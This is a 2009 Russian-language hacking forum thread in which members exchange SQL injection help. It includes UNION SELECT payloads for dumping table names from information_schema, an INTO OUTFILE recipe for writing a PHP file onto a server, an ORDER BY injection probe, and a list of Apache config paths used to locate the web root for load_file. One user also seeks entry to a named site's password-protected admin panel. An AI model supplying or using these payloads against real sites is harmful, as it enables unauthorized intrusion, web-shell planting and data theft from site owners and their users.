Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    vot posmotrite http://www.vashstile.ru/admin zdes kak to .htacces..

    esli napisu login i parol pravilno moqu zayti v admin panel??
     
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Не?
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    DeluxeS

    ну скажем так штатный экстрасенс работает сейчас в разделе инклюдов... можно линк в студию?

    и зачем тебе использовать здесь concat?
    union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1

    или же делaй запрос без concat-a ... или же попробуй так
    union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,table_schema),11+from+information_schema.tables+li mit+1,1
     
    #9783 Gorev, 8 Nov 2009
    Last edited: 8 Nov 2009
  4. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a moy vopros??
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    LokbatanLi http://translit.ru/
     
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    ne nado pomoymu..

    vot est takoy sayt http://www.vashstile.ru/admin
    v admin panle est .htacces a kak zayti v panel esli login i parol pravilno napisu moqu zayti panel??
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    LokbatanLi во первых я ни фига не понял твой вопрос, во вторых писать надо не транслитом а кирилицой, в третьих если есть пароль и логин то пробуй зайти милок , кто тебе мешает? там вообщето бейсик авторизация... и в четвертых...ты уже затрахал мой мозг (думаю не только мой)
     
  8. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    i ya toje pravilno napisu login i pass nu ne moqu zayti..takoy error Authorization Required//
     
  9. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Может авторизация возможна только с определённого ip
     
  10. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Есть там вывод...

    Можно и через ошибку...
     
  11. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Имеется следующая инъекция в UPDATE-запросе:
    Code:
    update session set value='last_url|s:5:"/[COLOR=Green][SQL-inj][/COLOR]";', update_date=now() where session_name='3nr3r857efj64a1kcbk7vpepn0'
    Что полезного можно сделать в данном случае и как?
     
  12. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a kto mojet raskazat ob file_priv out_into_file magic_quote est dlya etix satey..zaranie spasibo//
     
  13. [Forest]

    [Forest] New Member

    Joined:
    7 Nov 2009
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    Тебе еще не надоело?! юзай поиск по форуму! всё описанно до мельчайших подробностей!
     
  14. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    ne nasel dayte link toqda pojalusta//
     
    1 person likes this.
  15. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Народ видел кто небудь переборщик путей через load_file ?(через скулю)
    дефолтные не подходят
     
    #9795 Shadrin, 8 Nov 2009
    Last edited: 8 Nov 2009
  16. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    здесь читать нужно.

    file_priv бывает Y и N
    Y - есть права у юзера бд на чтение/запись
    N - нету прав на чтение/запись

    гыгы, мб into outfile ?
    Используеться для загрузки файла на сервер через базу данных
    Синтаксис:
    [select_options] select_list [INTO_OUTFILE file_name export_option

    По простонародному:
    union select 1,2,3...[n] into outfile 'full_patch/file.php'/*

    В двух словах не раскажешь, читай мануал по пхп

    Путей к чему?
     
  17. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    я так понял с твоего запроса,sql injection в параметре ГЕТ session?
    если "да",то что мешает ее раскручивать?
    Code:
    param=-false'+order+by+[...]/*
     
  18. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Ins3t
    полный путь до сайта, от корня,абсолютный вроде.
     
  19. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Ins3t spasibo po4ti ponel//
     
  20. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Если на серваке линух, то поищи httpd.conf, там будет прописан полный путь.

    Code:
    FreeBSD 
    apache 1.3 
    /usr/local/etc/apache/httpd.conf 
    
    apache 2.2 
    /usr/local/etc/apache22/httpd.conf 
    
    Linux 
    CentOS, Fedora (Redhat-системы) 
    /etc/httpd/conf/httpd.conf 
    
    Debian, Ubuntu 
    apache 1.3 
    /etc/apache/httpd.conf 
    
    apache 2.2 
    /etc/apache2/apache2.conf 
    
    Gentoo 
    apache 2.0 
    /etc/apache2/httpd.conf
    
     
    #9800 Ins3t, 8 Nov 2009
    Last edited: 8 Nov 2009
Thread Status:
Not open for further replies.